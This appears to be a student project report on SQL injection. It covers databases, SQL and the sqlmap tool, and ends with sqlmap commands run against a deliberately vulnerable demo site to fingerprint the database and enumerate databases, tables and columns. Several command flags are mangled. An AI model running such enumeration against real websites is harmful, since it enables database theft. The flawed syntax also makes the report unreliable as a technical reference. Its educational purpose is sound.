CHAPTER 1

INTRODUCTION

1.1

Introduction The project is talking about the security thread that can be happen in the network. Much kind of tricks and ways to hack the data from the internet, one of them is the SQL injection. SQL injection is yet another common vulnerability that is the result of lax input validation. Unlike cross-site scripting vulnerabilities that are ultimately

directed at your sites visitors, SQL injection is an attack on the site itselfin particular its database. The goal of SQL injection is to insert arbitrary data, most often a database query, into a string thats eventually executed by the database. The insidious query may attempt any number of actions, from retrieving alternate data, to modifying or removing information from the database.

1.2

Problem Background As mentioned in introduction part the SQL injection is kind of thread that exist in computer network. SQL injections objective is to retrieve the information that available in certain networks. The hackers, the users will try to expose the information and use it for their own purpose. The existing problem so far is: 1. The data can be misuse by the hackers 2. Privacy can be no longer be belong to the first owner

1.3

Objective o To study the existing methods used by others to disseminate information from the internet. o To run a program that can be used for SQL injection methods. o To evaluate the existing program that available in internet.

1.4

Project Aims The aims of this project are that could be used by the student or users to get the information and learn to understand how the SQl Injection works and can be a threat to the network.

1.5

Scope The scope will be the website that running in internet.

CHAPTER 2

LITERATURE REVIEW

2.1

Introduction In this chapter, it will be chapter that discuss about the things that related to the field of project. Knowing the information and how application will be function is very important. Literature review consists of the research aspect on the features, theories and the limitations that can be found, and it will be used as compass in application development process later on. All the information which is considered important will be collected and after that doing study on the existing application, so it can provide a better picture as well as getting more ideas how it works.

2.2

Introduction to Databases A database is a structured collection of data. The data are typically organized to model relevant aspects of reality (for example, the availability of rooms in hotels), in a way that supports processes requiring this information (for example, finding a hotel with vacancies). The term database is correctly applied to the data and their supporting data structures, and not to the database management system (DBMS). The database data collection with DBMS is called a database system. The term database system implies that the data are managed to some level of quality (measured in terms of accuracy, availability, usability, and resilience) and this in turn often implies the use of a general-purpose database management system (DBMS). A

general-purpose DBMS is typically a complex software system that meets many usage requirements to properly maintain its databases which are often large and complex.

2.3

SQL (Structured Query Language) SQL is one the one kind of programming language that specialized for managing data in relational databases management system (RDBMS). It is used to communicate with database. These are using the SQL statement in order to perform tasks such as update data on the databases, or retrieve the databases itself.

2.4

SQL Map SQLMap is an open source penetration testing tools that can be used to issue an automates command to process of detecting and exploiting sql injection flaw on a site and taking over the database servers, equipped with detection engine useful in its act. Thus in this topic we are going to explain how it is done and demonstrate the process of getting database fingerprint, finding database name and current user, enumerates database, and enumerates tables and columns.

2.5

SQL Injection SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.

CHAPTER 4

PROGRAM TESTING

4.1

Introduction This are the chapter where need to explain every step that will be conduct in order to get the information, learn the differences before finding the conclusions.

4.2

Testing These are few steps to testing the program or SQL injection into the one of the website Database Fingerprint -sqlmap.py u http://testphp.vulnweb.com/listproduct.php?cat=1

Finding the database name and current user sqlmap.py u http://testphp.vulnweb.com/listproducts.php?cat=1 current-db current-user

Enumerate Databases Sqlmap.py u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Enumerate Databases and Tables and Columns sqlmap.py u http://testphp.vulnweb.com/listproducts.php?cat=1 tables --columns